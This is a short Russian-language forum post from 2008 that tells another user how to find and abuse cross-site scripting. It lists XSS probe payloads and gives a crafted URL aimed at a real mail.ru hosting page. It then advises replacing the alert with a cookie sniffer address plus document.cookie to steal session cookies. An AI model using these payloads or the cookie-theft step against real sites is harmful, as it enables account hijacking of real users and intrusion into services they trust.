25.12.2008, 21:21
|
|
Познающий
Регистрация: 23.12.2008
Сообщений: 81
С нами:
9148120
Репутация:
97
|
|
Labrador, во первых надо сначало найти эту xss, напирмер вставлять во все поля которые видешь [для примера: <IMG SRC=javascript:alert("xss")> или "><script>alert('xss')</script> ] если вылитит алерт(окошко) то значит есть xss! Вот наглядный пример:
http://hosting.mail.ru/lc.jsp?loginput=&login=%3CIMG%20SRC=javascript:ale rt(%22xss%22)%3E
Далее можно заменить на адрес к сниферу + document.cookie И все!Еще больше разжевывать не буду, т.к. если хочешь чего то достичь, то читай и пытайся делать!
|
|
|